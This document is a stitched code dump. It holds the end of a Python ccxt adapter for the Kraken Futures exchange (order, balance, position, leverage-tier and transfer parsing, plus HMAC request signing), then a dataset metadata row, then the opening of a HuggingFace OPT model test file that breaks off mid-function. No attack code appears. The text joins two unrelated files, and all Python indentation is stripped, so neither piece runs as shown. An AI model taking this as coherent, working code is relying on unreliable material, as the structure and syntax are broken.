# "orderId": "61ca5732-3478-42fe-8362-abbfd9465294",
# "cliOrdId": null,
# "type": "lmt",
# "symbol": "pi_xbtusd",
# "side": "buy",
# "quantity": 10,
# "filled": 0,
# "limitPrice": 7500,
# "reduceOnly": False,
# "timestamp": "2019-12-11T17:17:33.888Z",
# "lastUpdateTimestamp": "2019-12-11T17:17:33.888Z"
# },
# "takerReducedQuantity": null,
# "type": "EXECUTION"
# }
# ]
# }
#
# EDIT ORDER
#
# {
# "status": "edited",
# "orderId": "022774bc-2c4a-4f26-9317-436c8d85746d",
# "receivedTime": "2019-09-05T16:47:47.521Z",
# "orderEvents": [
# {
# "old": {
# "orderId": "022774bc-2c4a-4f26-9317-436c8d85746d",
# "cliOrdId":null,
# "type": "lmt",
# "symbol": "pi_xbtusd",
# "side": "buy",
# "quantity":1000,
# "filled":0,
# "limitPrice":9400.0,
# "reduceOnly":false,
# "timestamp": "2019-09-05T16:41:35.173Z",
# "lastUpdateTimestamp": "2019-09-05T16:41:35.173Z"
# },
# "new": {
# "orderId": "022774bc-2c4a-4f26-9317-436c8d85746d",
# "cliOrdId": null,
# "type": "lmt",
# "symbol": "pi_xbtusd",
# "side": "buy",
# "quantity": 1501,
# "filled": 0,
# "limitPrice": 7200,
# "reduceOnly": False,
# "timestamp": "2019-09-05T16:41:35.173Z",
# "lastUpdateTimestamp": "2019-09-05T16:47:47.519Z"
# },
# "reducedQuantity": null,
# "type": "EDIT"
# }
# ]
# }
#
# CANCEL ORDER
#
# {
# "status": "cancelled",
# "orderEvents": [
# {
# "uid": "85c40002-3f20-4e87-9302-262626c3531b",
# "order": {
# "orderId": "85c40002-3f20-4e87-9302-262626c3531b",
# "cliOrdId": null,
# "type": "lmt",
# "symbol": "pi_xbtusd",
# "side": "buy",
# "quantity": 1000,
# "filled": 0,
# "limitPrice": 10144,
# "stopPrice": null,
# "reduceOnly": False,
# "timestamp": "2019-08-01T15:26:27.790Z"
# },
# "type": "CANCEL"
# }
# ]
# }
#
# FETCH OPEN ORDERS
#
# {
# "order_id": "59302619-41d2-4f0b-941f-7e7914760ad3",
# "symbol": "pi_xbtusd",
# "side": "sell",
# "orderType": "lmt",
# "limitPrice": 10640,
# "unfilledSize": 304,
# "receivedTime": "2019-09-05T17:01:17.410Z",
# "status": "untouched",
# "filledSize": 0,
# "reduceOnly": True,
# "lastUpdateTime": "2019-09-05T17:01:17.410Z"
# }
#
orderEvents = self.safe_value(order, 'orderEvents', [])
details = None
isPrior = False
fixed = False
statusId = None
price = None
trades = []
if len(orderEvents) > 0:
executions = []
for i in range(0, len(orderEvents)):
item = orderEvents[i]
if self.safe_string(item, 'type') == 'EXECUTION':
executions.append(item)
# Final order(after placement / editing / execution / canceling)
orderTrigger = self.safe_value(item, 'orderTrigger')
details = self.safe_value_2(item, 'new', 'order', orderTrigger)
if details is not None:
isPrior = False
fixed = True
elif not fixed:
orderPriorExecution = self.safe_value(item, 'orderPriorExecution')
details = self.safe_value_2(item, 'orderPriorExecution', 'orderPriorEdit')
price = self.safe_string(orderPriorExecution, 'limitPrice')
if details is not None:
isPrior = True
trades = self.parse_trades(executions)
statusId = self.safe_string(order, 'status')
if details is None:
details = order
if statusId is None:
statusId = self.safe_string(details, 'status')
# This may be incorrectly marked as "open" if only execution report is given,
# but will be fixed below
status = self.parse_order_status(statusId)
isClosed = self.in_array(status, ['canceled', 'rejected', 'closed'])
marketId = self.safe_string(details, 'symbol')
market = self.safe_market(marketId, market)
timestamp = self.parse8601(self.safe_string_2(details, 'timestamp', 'receivedTime'))
if price is None:
price = self.safe_string(details, 'limitPrice')
amount = self.safe_string(details, 'quantity')
filled = self.safe_string_2(details, 'filledSize', 'filled', '0.0')
remaining = self.safe_string(details, 'unfilledSize')
average = None
filled2 = '0.0'
if len(trades) > 0:
vwapSum = '0.0'
for i in range(0, len(trades)):
trade = trades[i]
tradeAmount = self.safe_string(trade, 'amount')
tradePrice = self.safe_string(trade, 'price')
filled2 = Precise.string_add(filled2, tradeAmount)
vwapSum = Precise.string_add(vwapSum, Precise.string_mul(tradeAmount, tradePrice))
average = Precise.string_div(vwapSum, filled2)
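# e.g. two fills of 2 @ 100 and 1 @ 103 give filled2 = 3,
# vwapSum = 2 * 100 + 1 * 103 = 303, and average = 303 / 3 = 101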
if (amount is not None) and (not isClosed) and isPrior and Precise.string_ge(filled2, amount):
status = 'closed'
isClosed = True
if isPrior:
filled = Precise.string_add(filled, filled2)
else:
filled = Precise.string_max(filled, filled2)
if remaining is None:
if isPrior:
if amount is not None:
# remaining amount before execution minus executed amount
remaining = Precise.string_sub(amount, filled2)
else:
remaining = amount
# if fetchOpenOrders are parsed
if (amount is None) and (not isPrior) and (remaining is not None):
amount = Precise.string_add(filled, remaining)
cost = None
if (filled is not None) and (market is not None):
whichPrice = average if (average is not None) else price
if whichPrice is not None:
if market['linear']:
cost = Precise.string_mul(filled, whichPrice) # in quote
else:
cost = Precise.string_div(filled, whichPrice) # in base
id = self.safe_string_2(order, 'order_id', 'orderId')
if id is None:
id = self.safe_string_2(details, 'orderId', 'uid')
type = self.safe_string_lower_2(details, 'type', 'orderType')
timeInForce = 'gtc'
if type == 'ioc' or self.parse_order_type(type) == 'market':
timeInForce = 'ioc'
return self.safe_order({
'info': order,
'id': id,
'clientOrderId': self.safe_string_2(details, 'clientOrderId', 'clientId'),
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'lastTradeTimestamp': None,
'symbol': self.safe_string(market, 'symbol'),
'type': self.parse_order_type(type),
'timeInForce': timeInForce,
'postOnly': type == 'post',
'side': self.safe_string(details, 'side'),
'price': price,
'stopPrice': self.safe_string(details, 'triggerPrice'),
'triggerPrice': self.safe_string(details, 'triggerPrice'),
'amount': amount,
'cost': cost,
'average': average,
'filled': filled,
'remaining': remaining,
'status': status,
'fee': None,
'fees': None,
'trades': trades,
})
async def fetch_my_trades(self, symbol: Optional[str] = None, since: Optional[int] = None, limit: Optional[int] = None, params={}):
await self.load_markets()
market = None
if symbol is not None:
market = self.market(symbol)
response = await self.privateGetFills(params)
#
# {
# "result": "success",
# "serverTime": "2016-02-25T09:45:53.818Z",
# "fills": [
# {
# "fillTime": "2016-02-25T09:47:01.000Z",
# "order_id": "c18f0c17-9971-40e6-8e5b-10df05d422f0",
# "fill_id": "522d4e08-96e7-4b44-9694-bfaea8fe215e",
# "cliOrdId": "d427f920-ec55-4c18-ba95-5fe241513b30", # EXTRA
# "symbol": "fi_xbtusd_180615",
# "side": "buy",
# "size": 2000,
# "price": 4255,
# "fillType": "maker"
# },
# ...
# ]
# }
#
return self.parse_trades(response['fills'], market, since, limit)
async def fetch_balance(self, params={}):
"""
Fetch the balance for a sub-account, all sub-account balances are inside 'info' in the response
:param dict params: Exchange specific parameters
:param str params['type']: The sub-account type to query the balance of, possible values include 'flex', 'cash'/'main'/'funding', or a market symbol * defaults to 'cash' *
:param str params['symbol']: A unified market symbol, when assigned the balance for a trading market that matches the symbol is returned
:returns: A `balance structure <https://docs.ccxt.com/#/?id=balance-structure>`
"""
await self.load_markets()
type = self.safe_string_2(params, 'type', 'account')
symbol = self.safe_string(params, 'symbol')
params = self.omit(params, ['type', 'account', 'symbol'])
response = await self.privateGetAccounts(params)
#
# {
# result: 'success',
# accounts: {
# fi_xbtusd: {
# auxiliary: {usd: '0', pv: '0.0', pnl: '0.0', af: '0.0', funding: '0.0'},
# marginRequirements: {im: '0.0', mm: '0.0', lt: '0.0', tt: '0.0'},
# triggerEstimates: {im: '0', mm: '0', lt: '0', tt: '0'},
# balances: {xbt: '0.0'},
# currency: 'xbt',
# type: 'marginAccount'
# },
# cash: {
# balances: {
# eur: '0.0',
# gbp: '0.0',
# bch: '0.0',
# xrp: '2.20188538338',
# usd: '0.0',
# eth: '0.0',
# usdt: '0.0',
# ltc: '0.0',
# usdc: '0.0',
# xbt: '0.0'
# },
# type: 'cashAccount'
# },
# fv_xrpxbt: {
# auxiliary: {usd: '0', pv: '0.0', pnl: '0.0', af: '0.0', funding: '0.0'},
# marginRequirements: {im: '0.0', mm: '0.0', lt: '0.0', tt: '0.0'},
# triggerEstimates: {im: '0', mm: '0', lt: '0', tt: '0'},
# balances: {xbt: '0.0'},
# currency: 'xbt',
# type: 'marginAccount'
# },
# fi_xrpusd: {
# auxiliary: {usd: '0', pv: '11.0', pnl: '0.0', af: '11.0', funding: '0.0'},
# marginRequirements: {im: '0.0', mm: '0.0', lt: '0.0', tt: '0.0'},
# triggerEstimates: {im: '0', mm: '0', lt: '0', tt: '0'},
# balances: {xrp: '11.0'},
# currency: 'xrp',
# type: 'marginAccount'
# },
# fi_ethusd: {
# auxiliary: {usd: '0', pv: '0.0', pnl: '0.0', af: '0.0', funding: '0.0'},
# marginRequirements: {im: '0.0', mm: '0.0', lt: '0.0', tt: '0.0'},
# triggerEstimates: {im: '0', mm: '0', lt: '0', tt: '0'},
# balances: {eth: '0.0'},
# currency: 'eth',
# type: 'marginAccount'
# },
# fi_ltcusd: {
# auxiliary: {usd: '0', pv: '0.0', pnl: '0.0', af: '0.0', funding: '0.0'},
# marginRequirements: {im: '0.0', mm: '0.0', lt: '0.0', tt: '0.0'},
# triggerEstimates: {im: '0', mm: '0', lt: '0', tt: '0'},
# balances: {ltc: '0.0'},
# currency: 'ltc',
# type: 'marginAccount'
# },
# fi_bchusd: {
# auxiliary: {usd: '0', pv: '0.0', pnl: '0.0', af: '0.0', funding: '0.0'},
# marginRequirements: {im: '0.0', mm: '0.0', lt: '0.0', tt: '0.0'},
# triggerEstimates: {im: '0', mm: '0', lt: '0', tt: '0'},
# balances: {bch: '0.0'},
# currency: 'bch',
# type: 'marginAccount'
# },
# flex: {
# currencies: {},
# initialMargin: '0.0',
# initialMarginWithOrders: '0.0',
# maintenanceMargin: '0.0',
# balanceValue: '0.0',
# portfolioValue: '0.0',
# collateralValue: '0.0',
# pnl: '0.0',
# unrealizedFunding: '0.0',
# totalUnrealized: '0.0',
# totalUnrealizedAsMargin: '0.0',
# availableMargin: '0.0',
# marginEquity: '0.0',
# type: 'multiCollateralMarginAccount'
# }
# },
# serverTime: '2022-04-12T07:48:07.475Z'
# }
#
datetime = self.safe_string(response, 'serverTime')
if type == 'marginAccount' or type == 'margin':
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchBalance requires symbol argument for margin accounts')
type = symbol
if type is None:
type = 'cash' if (symbol is None) else symbol
accountName = self.parse_account(type)
accounts = self.safe_value(response, 'accounts')
account = self.safe_value(accounts, accountName)
if account is None:
type = '' if (type is None) else type
symbol = '' if (symbol is None) else symbol
raise BadRequest(self.id + ' fetchBalance has no account for type ' + type + ' / symbol ' + symbol)
balance = self.parse_balance(account)
return self.extend({
'info': response,
'timestamp': self.parse8601(datetime),
'datetime': datetime,
}, balance)
def parse_balance(self, response):
#
# cashAccount
#
# {
# balances: {
# eur: '0.0',
# gbp: '0.0',
# bch: '0.0',
# xrp: '2.20188538338',
# usd: '0.0',
# eth: '0.0',
# usdt: '0.0',
# ltc: '0.0',
# usdc: '0.0',
# xbt: '0.0'
# },
# type: 'cashAccount'
# }
#
# marginAccount, e.g. fi_xrpusd
#
# {
# auxiliary: {
# usd: '0',
# pv: '11.0',
# pnl: '0.0',
# af: '11.0',
# funding: '0.0'
# },
# marginRequirements: {im: '0.0', mm: '0.0', lt: '0.0', tt: '0.0'},
# triggerEstimates: {im: '0', mm: '0', lt: '0', tt: '0'},
# balances: {xrp: '11.0'},
# currency: 'xrp',
# type: 'marginAccount'
# }
#
# flex/multiCollateralMarginAccount
#
# {
# currencies: {
# USDT: {
# quantity: '1',
# value: '1.0001',
# collateral: '0.9477197625',
# available: '1.0'
# }
# },
# initialMargin: '0.0',
# initialMarginWithOrders: '0.0',
# maintenanceMargin: '0.0',
# balanceValue: '1.0',
# portfolioValue: '1.0',
# collateralValue: '0.95',
# pnl: '0.0',
# unrealizedFunding: '0.0',
# totalUnrealized: '0.0',
# totalUnrealizedAsMargin: '0.0',
# availableMargin: '0.95',
# marginEquity: '0.95',
# type: 'multiCollateralMarginAccount'
# }
#
accountType = self.safe_string_2(response, 'accountType', 'type')
isFlex = (accountType == 'multiCollateralMarginAccount')
isCash = (accountType == 'cashAccount')
balances = self.safe_value_2(response, 'balances', 'currencies', {})
result = {}
currencyIds = list(balances.keys())
for i in range(0, len(currencyIds)):
currencyId = currencyIds[i]
balance = balances[currencyId]
code = self.safe_currency_code(currencyId)
splitCode = code.split('_')
codeLength = len(splitCode)
if codeLength > 1:
continue # Removes contract codes like PI_XRPUSD
account = self.account()
if isFlex:
account['total'] = self.safe_string(balance, 'quantity')
account['free'] = self.safe_string(balance, 'available')
elif isCash:
account['used'] = '0.0'
account['total'] = balance
else:
auxiliary = self.safe_value(response, 'auxiliary')
account['free'] = self.safe_string(auxiliary, 'af')
account['total'] = self.safe_string(auxiliary, 'pv')
result[code] = account
return self.safe_balance(result)
async def fetch_funding_rate_history(self, symbol: Optional[str] = None, since: Optional[int] = None, limit: Optional[int] = None, params={}):
self.check_required_symbol('fetchFundingRateHistory', symbol)
await self.load_markets()
market = self.market(symbol)
if not market['swap']:
raise BadRequest(self.id + ' fetchFundingRateHistory() supports swap contracts only')
request = {
'symbol': market['id'].upper(),
}
response = await self.publicGetHistoricalfundingrates(self.extend(request, params))
#
# {
# rates: [
# {
# timestamp: '2018-08-31T16:00:00.000Z',
# fundingRate: '2.18900669884E-7',
# relativeFundingRate: '0.000060779960000000'
# },
# ...
# ]
# }
#
rates = self.safe_value(response, 'rates')
result = []
for i in range(0, len(rates)):
item = rates[i]
datetime = self.safe_string(item, 'timestamp')
result.append({
'info': item,
'symbol': symbol,
'fundingRate': self.safe_number(item, 'fundingRate'),
'timestamp': self.parse8601(datetime),
'datetime': datetime,
})
sorted = self.sort_by(result, 'timestamp')
return self.filter_by_symbol_since_limit(sorted, symbol, since, limit)
async def fetch_positions(self, symbols: Optional[List[str]] = None, params={}):
"""
Fetches current contract trading positions
:param [str] symbols: List of unified symbols
:param dict params: Not used by krakenfutures
:returns: Parsed exchange response for positions
"""
await self.load_markets()
request = {}
response = await self.privateGetOpenpositions(request)
#
# {
# result: 'success',
# openPositions: [
# {
# side: 'long',
# symbol: 'pi_xrpusd',
# price: '0.7533',
# fillTime: '2022-03-03T22:51:16.566Z',
# size: '230',
# unrealizedFunding: '-0.001878596918214635'
# }
# ],
# serverTime: '2022-03-03T22:51:16.566Z'
# }
#
result = self.parse_positions(response)
return self.filter_by_array(result, 'symbol', symbols, False)
def parse_positions(self, response, symbols: Optional[List[str]] = None, params={}):
result = []
positions = self.safe_value(response, 'openPositions')
for i in range(0, len(positions)):
position = self.parse_position(positions[i])
result.append(position)
return result
def parse_position(self, position, market=None):
# cross
# {
# side: 'long',
# symbol: 'pi_xrpusd',
# price: '0.7533',
# fillTime: '2022-03-03T22:51:16.566Z',
# size: '230',
# unrealizedFunding: '-0.001878596918214635'
# }
#
# isolated
# {
# "side":"long",
# "symbol":"pf_ftmusd",
# "price":"0.4921",
# "fillTime":"2023-02-22T11:37:16.685Z",
# "size":"1",
# "unrealizedFunding":"-8.155240068885155E-8",
# "pnlCurrency":"USD",
# "maxFixedLeverage":"1.0"
# }
#
leverage = self.safe_number(position, 'maxFixedLeverage')
marginType = 'cross'
if leverage is not None:
marginType = 'isolated'
datetime = self.safe_string(position, 'fillTime')
marketId = self.safe_string(position, 'symbol')
market = self.safe_market(marketId, market)
return {
'info': position,
'symbol': market['symbol'],
'timestamp': self.parse8601(datetime),
'datetime': datetime,
'initialMargin': None,
'initialMarginPercentage': None,
'maintenanceMargin': None,
'maintenanceMarginPercentage': None,
'entryPrice': self.safe_number(position, 'price'),
'notional': None,
'leverage': leverage,
'unrealizedPnl': self.safe_number(position, 'unrealizedFunding'),
'contracts': self.safe_number(position, 'size'),
'contractSize': self.safe_number(market, 'contractSize'),
'marginRatio': None,
'liquidationPrice': None,
'markPrice': None,
'collateral': None,
'marginType': marginType,
'side': self.safe_string(position, 'side'),
'percentage': None,
}
async def fetch_leverage_tiers(self, symbols: Optional[List[str]] = None, params={}):
await self.load_markets()
response = await self.publicGetInstruments(params)
#
# {
# "result": "success",
# "instruments": [
# {
# "symbol": "fi_ethusd_180928",
# "type": "futures_inverse", # futures_vanilla # spot index
# "underlying": "rr_ethusd",
# "lastTradingTime": "2018-09-28T15:00:00.000Z",
# "tickSize": 0.1,
# "contractSize": 1,
# "tradeable": True,
# "marginLevels": [
# {
# "contracts":0,
# "initialMargin":0.02,
# "maintenanceMargin":0.01
# },
# {
# "contracts":250000,
# "initialMargin":0.04,
# "maintenanceMargin":0.02
# },
# ...
# ],
# "isin": "GB00JVMLMP88",
# "retailMarginLevels": [
# {
# "contracts": 0,
# "initialMargin": 0.5,
# "maintenanceMargin": 0.25
# }
# ],
# "tags": [],
# },
# {
# "symbol": "in_xbtusd",
# "type": "spot index",
# "tradeable":false
# }
# ]
# "serverTime": "2018-07-19T11:32:39.433Z"
# }
#
data = self.safe_value(response, 'instruments')
return self.parse_leverage_tiers(data, symbols, 'symbol')
def parse_market_leverage_tiers(self, info, market=None):
"""
* @ignore
* @param info Exchange market response for 1 market
* @param market CCXT market
"""
#
# {
# "symbol": "fi_ethusd_180928",
# "type": "futures_inverse", # futures_vanilla # spot index
# "underlying": "rr_ethusd",
# "lastTradingTime": "2018-09-28T15:00:00.000Z",
# "tickSize": 0.1,
# "contractSize": 1,
# "tradeable": True,
# "marginLevels": [
# {
# "contracts":0,
# "initialMargin":0.02,
# "maintenanceMargin":0.01
# },
# {
# "contracts":250000,
# "initialMargin":0.04,
# "maintenanceMargin":0.02
# },
# ...
# ],
# "isin": "GB00JVMLMP88",
# "retailMarginLevels": [
# {
# "contracts": 0,
# "initialMargin": 0.5,
# "maintenanceMargin": 0.25
# }
# ],
# "tags": [],
# }
#
marginLevels = self.safe_value(info, 'marginLevels')
id = self.safe_string(info, 'symbol')
market = self.safe_market(id, market)
tiers = []
for i in range(0, len(marginLevels)):
tier = marginLevels[i]
initialMargin = self.safe_string(tier, 'initialMargin')
notionalFloor = self.safe_number(tier, 'contracts')
if i != 0:
tiersLength = len(tiers)
previousTier = tiers[tiersLength - 1]
previousTier['notionalCap'] = notionalFloor
tiers.append({
'tier': self.sum(i, 1),
'currency': market['quote'],
'notionalFloor': notionalFloor,
'notionalCap': None,
'maintenanceMarginRate': self.safe_number(tier, 'maintenanceMargin'),
'maxLeverage': self.parse_number(Precise.string_div('1', initialMargin)),
'info': tier,
})
return tiers
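# Worked example using the sample payload above: marginLevels of
# [{contracts: 0, initialMargin: 0.02, maintenanceMargin: 0.01},
#  {contracts: 250000, initialMargin: 0.04, maintenanceMargin: 0.02}]
# produce tier 1 (notionalFloor 0, notionalCap 250000, maxLeverage 1/0.02 = 50)
# and tier 2 (notionalFloor 250000, notionalCap None, maxLeverage 1/0.04 = 25).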
def parse_transfer(self, transfer, currency=None):
#
# transfer
#
# {
# result: 'success',
# serverTime: '2022-04-12T01:22:53.420Z'
# }
#
datetime = self.safe_string(transfer, 'serverTime')
return {
'info': transfer,
'id': None,
'timestamp': self.parse8601(datetime),
'datetime': datetime,
'currency': self.safe_string(currency, 'code'),
'amount': None,
'fromAccount': None,
'toAccount': None,
'status': self.safe_string(transfer, 'result'),
}
def parse_account(self, account):
accountByType = {
'main': 'cash',
'funding': 'cash',
'future': 'cash',
'futures': 'cash',
'cashAccount': 'cash',
'multiCollateralMarginAccount': 'flex',
'multiCollateral': 'flex',
'multiCollateralMargin': 'flex',
}
if account in accountByType:
return accountByType[account]
elif account in self.markets:
market = self.market(account)
marketId = market['id']
splitId = marketId.split('_')
if market['inverse']:
return 'fi_' + self.safe_string(splitId, 1)
else:
return 'fv_' + self.safe_string(splitId, 1)
else:
return account
async def transfer_out(self, code: str, amount, params={}):
"""
transfer from futures wallet to spot wallet
:param str code: Unified currency code
:param float amount: Size of the transfer
:param dict params: Exchange specific parameters
:returns: a `transfer structure <https://docs.ccxt.com/#/?id=transfer-structure>`
"""
return await self.transfer(code, amount, 'future', 'spot', params)
async def transfer(self, code: str, amount, fromAccount, toAccount, params={}):
"""
transfers currencies between sub-accounts
:param str code: Unified currency code
:param float amount: Size of the transfer
:param str fromAccount: 'main'/'funding'/'future', 'flex', or a unified market symbol
:param str toAccount: 'main'/'funding', 'flex', 'spot' or a unified market symbol
:param dict params: Exchange specific parameters
:returns: a `transfer structure <https://docs.ccxt.com/#/?id=transfer-structure>`
"""
await self.load_markets()
currency = self.currency(code)
method = 'privatePostTransfer'
request = {
'amount': amount,
}
if fromAccount == 'spot':
raise BadRequest(self.id + ' transfer does not yet support transfers from spot')
if toAccount == 'spot':
if self.parse_account(fromAccount) != 'cash':
raise BadRequest(self.id + ' transfer cannot transfer from ' + fromAccount + ' to ' + toAccount)
method = 'privatePostWithdrawal'
request['currency'] = currency['id']
else:
request['fromAccount'] = self.parse_account(fromAccount)
request['toAccount'] = self.parse_account(toAccount)
request['unit'] = currency['id']
response = await getattr(self, method)(self.extend(request, params))
#
# {
# result: 'success',
# serverTime: '2022-04-12T01:22:53.420Z'
# }
#
transfer = self.parse_transfer(response, currency)
return self.extend(transfer, {
'amount': amount,
'fromAccount': fromAccount,
'toAccount': toAccount,
})
def handle_errors(self, code, reason, url, method, headers, body, response, requestHeaders, requestBody):
if response is None:
return None
if code == 429:
raise DDoSProtection(self.id + ' ' + body)
message = self.safe_string(response, 'error')
if message is None:
return None
feedback = self.id + ' ' + body
self.throw_exactly_matched_exception(self.exceptions['exact'], message, feedback)
self.throw_broadly_matched_exception(self.exceptions['broad'], message, feedback)
if code == 400:
raise BadRequest(feedback)
raise ExchangeError(feedback) # unknown message
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
apiVersions = self.safe_value(self.options['versions'], api, {})
methodVersions = self.safe_value(apiVersions, method, {})
defaultVersion = self.safe_string(methodVersions, path, self.version)
version = self.safe_string(params, 'version', defaultVersion)
params = self.omit(params, 'version')
apiAccess = self.safe_value(self.options['access'], api, {})
methodAccess = self.safe_value(apiAccess, method, {})
access = self.safe_string(methodAccess, path, 'public')
endpoint = version + '/' + self.implode_params(path, params)
params = self.omit(params, self.extract_params(path))
query = endpoint
postData = ''
if params:
postData = self.urlencode(params)
query += '?' + postData
url = self.urls['api'][api] + query
if api == 'private' or access == 'private':
auth = postData + '/api/'
if api != 'private':
auth += api + '/'
auth += endpoint # 1
hash = self.hash(self.encode(auth), 'sha256', 'binary') # 2
secret = self.base64_to_binary(self.secret) # 3
signature = self.hmac(hash, secret, hashlib.sha512, 'base64') # 4-5
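# i.e., for the private API the header works out to roughly:
# Authent = base64(HMAC_SHA512(key=base64decode(secret),
#                              msg=SHA256(postData + '/api/' + endpoint)))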
headers = {
'Content-Type': 'application/json',
'APIKey': self.apiKey,
'Authent': signature,
}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
| [
"[email protected]"
] | |
67a9ace1630cd9600d67b37a04481a0c6a93d353 | e8a48749014f372633de65d79bfa26a3ad743d89 | /tests/models/opt/test_modeling_opt.py | 86fa8c2c4bb8c184ac808e53fbf5c9944ad54f22 | [
"Apache-2.0"
] | permissive | pvcastro/pytorch-pretrained-BERT | 183b7291972c8d8c66c995647df66c1fe439a763 | 49cd736a288a315d741e5c337790effa4c9fa689 | refs/heads/master | 2022-08-19T08:55:16.332585 | 2022-06-30T16:11:08 | 2022-06-30T16:11:08 | 168,367,637 | 1 | 0 | Apache-2.0 | 2019-01-30T15:39:42 | 2019-01-30T15:39:41 | null | UTF-8 | Python | false | false | 17,670 | py | # coding=utf-8
# Copyright 2021, The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Testing suite for the PyTorch OPT model. """
import copy
import tempfile
import unittest
import timeout_decorator # noqa
from transformers import OPTConfig, is_torch_available
from transformers.testing_utils import require_torch, require_torch_gpu, slow, torch_device
from ...generation.test_generation_utils import GenerationTesterMixin
from ...test_configuration_common import ConfigTester
from ...test_modeling_common import ModelTesterMixin, ids_tensor
if is_torch_available():
import torch
from transformers import GPT2Tokenizer, OPTForCausalLM, OPTModel
def prepare_opt_inputs_dict(
config,
input_ids,
decoder_input_ids=None,
attention_mask=None,
decoder_attention_mask=None,
head_mask=None,
decoder_head_mask=None,
):
if attention_mask is None:
attention_mask = input_ids.ne(config.pad_token_id)
return {
"input_ids": input_ids,
"attention_mask": attention_mask,
"head_mask": head_mask,
}
class OPTModelTester:
def __init__(
self,
parent,
batch_size=13,
seq_length=7,
is_training=True,
use_labels=False,
vocab_size=99,
hidden_size=16,
num_hidden_layers=5,
num_attention_heads=4,
intermediate_size=4,
hidden_act="gelu",
hidden_dropout_prob=0.1,
attention_probs_dropout_prob=0.1,
max_position_embeddings=20,
eos_token_id=2,
pad_token_id=1,
bos_token_id=0,
embed_dim=16,
word_embed_proj_dim=16,
):
self.parent = parent
self.batch_size = batch_size
self.seq_length = seq_length
self.is_training = is_training
self.use_labels = use_labels
self.vocab_size = vocab_size
self.hidden_size = hidden_size
self.num_hidden_layers = num_hidden_layers
self.num_attention_heads = num_attention_heads
self.intermediate_size = intermediate_size
self.hidden_act = hidden_act
self.hidden_dropout_prob = hidden_dropout_prob
self.attention_probs_dropout_prob = attention_probs_dropout_prob
self.max_position_embeddings = max_position_embeddings
self.eos_token_id = eos_token_id
self.pad_token_id = pad_token_id
self.bos_token_id = bos_token_id
self.embed_dim = embed_dim
self.word_embed_proj_dim = word_embed_proj_dim
self.is_encoder_decoder = False
def prepare_config_and_inputs(self):
input_ids = ids_tensor([self.batch_size, self.seq_length], self.vocab_size).clamp(3)
input_ids[:, -1] = self.eos_token_id # Eos Token
decoder_input_ids = ids_tensor([self.batch_size, self.seq_length], self.vocab_size)
config = self.get_config()
inputs_dict = prepare_opt_inputs_dict(config, input_ids, decoder_input_ids)
return config, inputs_dict
def get_config(self):
return OPTConfig(
vocab_size=self.vocab_size,
hidden_size=self.hidden_size,
num_hidden_layers=self.num_hidden_layers,
num_attention_heads=self.num_attention_heads,
ffn_dim=self.intermediate_size,
dropout=self.hidden_dropout_prob,
attention_dropout=self.attention_probs_dropout_prob,
max_position_embeddings=self.max_position_embeddings,
eos_token_id=self.eos_token_id,
bos_token_id=self.bos_token_id,
pad_token_id=self.pad_token_id,
embed_dim=self.embed_dim,
is_encoder_decoder=False,
word_embed_proj_dim=self.word_embed_proj_dim,
)
def get_pipeline_config(self):
config = self.get_config()
config.max_position_embeddings = 100
return config
def prepare_config_and_inputs_for_common(self):
config, inputs_dict = self.prepare_config_and_inputs()
return config, inputs_dict
def create_and_check_decoder_model_past_large_inputs(self, config, inputs_dict):
model = OPTModel(config=config).to(torch_device).eval()
input_ids = inputs_dict["input_ids"]
attention_mask = inputs_dict["attention_mask"]
head_mask = inputs_dict["head_mask"]
# first forward pass
outputs = model(input_ids, attention_mask=attention_mask, head_mask=head_mask, use_cache=True)
output, past_key_values = outputs.to_tuple()
# create hypothetical multiple next token and extent to next_input_ids
next_tokens = ids_tensor((self.batch_size, 3), config.vocab_size)
next_attn_mask = ids_tensor((self.batch_size, 3), 2)
# append to next input_ids and
next_input_ids = torch.cat([input_ids, next_tokens], dim=-1)
next_attention_mask = torch.cat([attention_mask, next_attn_mask], dim=-1)
output_from_no_past = model(next_input_ids, attention_mask=next_attention_mask)["last_hidden_state"]
output_from_past = model(next_tokens, attention_mask=next_attention_mask, past_key_values=past_key_values)[
"last_hidden_state"
]
# select random slice
random_slice_idx = ids_tensor((1,), output_from_past.shape[-1]).item()
output_from_no_past_slice = output_from_no_past[:, -3:, random_slice_idx].detach()
output_from_past_slice = output_from_past[:, :, random_slice_idx].detach()
self.parent.assertTrue(output_from_past_slice.shape[1] == next_tokens.shape[1])
# test that outputs are equal for slice
self.parent.assertTrue(torch.allclose(output_from_past_slice, output_from_no_past_slice, atol=1e-3))
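# i.e. incremental decoding with cached key/values must match a full forward
# pass over the concatenated inputs, up to numerical tolerance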
@require_torch
class OPTModelTest(ModelTesterMixin, GenerationTesterMixin, unittest.TestCase):
all_model_classes = (OPTModel, OPTForCausalLM) if is_torch_available() else ()
all_generative_model_classes = (OPTForCausalLM,) if is_torch_available() else ()
is_encoder_decoder = False
fx_compatible = True
test_pruning = False
test_missing_keys = False
def setUp(self):
self.model_tester = OPTModelTester(self)
self.config_tester = ConfigTester(self, config_class=OPTConfig)
def test_config(self):
self.config_tester.run_common_tests()
def test_save_load_strict(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs()
for model_class in self.all_model_classes:
model = model_class(config)
with tempfile.TemporaryDirectory() as tmpdirname:
model.save_pretrained(tmpdirname)
model2, info = model_class.from_pretrained(tmpdirname, output_loading_info=True)
self.assertEqual(info["missing_keys"], [])
def test_decoder_model_past_with_large_inputs(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_decoder_model_past_large_inputs(*config_and_inputs)
def test_inputs_embeds(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
for model_class in (OPTModel,):
model = model_class(config)
model.to(torch_device)
model.eval()
inputs = copy.deepcopy(self._prepare_for_class(inputs_dict, model_class))
if not self.is_encoder_decoder:
input_ids = inputs["input_ids"]
del inputs["input_ids"]
else:
encoder_input_ids = inputs["input_ids"]
decoder_input_ids = inputs.get("decoder_input_ids", encoder_input_ids)
del inputs["input_ids"]
inputs.pop("decoder_input_ids", None)
